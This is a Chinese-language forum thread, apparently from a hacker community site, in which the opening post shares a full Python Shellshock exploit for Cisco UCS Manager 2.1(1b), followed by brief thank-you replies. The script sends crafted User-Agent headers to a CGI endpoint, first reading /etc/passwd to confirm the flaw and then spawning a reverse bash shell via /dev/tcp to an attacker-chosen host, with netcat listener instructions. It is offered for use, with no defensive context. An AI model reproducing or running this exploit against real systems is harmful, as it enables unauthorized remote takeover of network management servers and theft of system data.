请选择 进入手机版 | 继续访问电脑版
查看: 8185|回复: 2307

[Other] 思科UCS管理器2.1(1b) - Shellshock Exploit

[复制链接]
  • TA的每日心情

    5 天前
  • 签到天数: 903 天

    [LV.10]以坛为家III

    发表于 2016-3-17 13:24:21 | 显示全部楼层 |阅读模式
    新鲜的出炉的

    [Python] 纯文本查看 复制代码
    #!/usr/bin/python
      
    import sys
    import requests
    import time
       
    if len(sys.argv) < 4:
        print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
        print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
        print "[*]"
        print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
        print "[*] Listener: nc -lvp <port>"
        print "\n"
        sys.exit()
      
    #Disables request warning for cert validation ignore.
    requests.packages.urllib3.disable_warnings() 
    ucs = sys.argv[1]
    url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
    attackhost = sys.argv[2]
    revshellport = sys.argv[3]
    headers1 = {
            'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
            }
    headers2 = {
            "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
            }
      
    def exploit():
        try:
            r = requests.get(url, headers=headers1, verify=False, timeout=5)
        except Exception, e:
            if 'timeout' in str(e):
                print "[+] Success.  Enjoy your shell..."
            else:
                print "[-] Something is wrong..."
                print "[-] Error: " + str(e)
      
    def main():
        try:
            r = requests.get(url, headers=headers2, verify=False, timeout=3)
            if r.content.startswith('\nroot:'):
                print "[+] Host is vulnerable, spawning shell..."
                time.sleep(3)
                exploit()
            else:
                print "[-] Host is not vulnerable, quitting..."
                sys.exit()
        except Exception, e:
            print "[-] Something is wrong..."
            print "[-] Error: " + str(e)
      
    if __name__ == "__main__":
        main()
    回复

    使用道具 举报

  • TA的每日心情

    2020-9-14 19:17
  • 签到天数: 418 天

    [LV.9]以坛为家II

    发表于 2016-3-17 20:08:20 | 显示全部楼层
    谢谢楼主分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-18 01:14:30 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2016-3-18 01:53:55 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-18 03:00:53 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-18 16:02:51 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-3-18 19:33:57 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-19 00:30:58 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-19 04:10:30 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-19 13:01:14 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表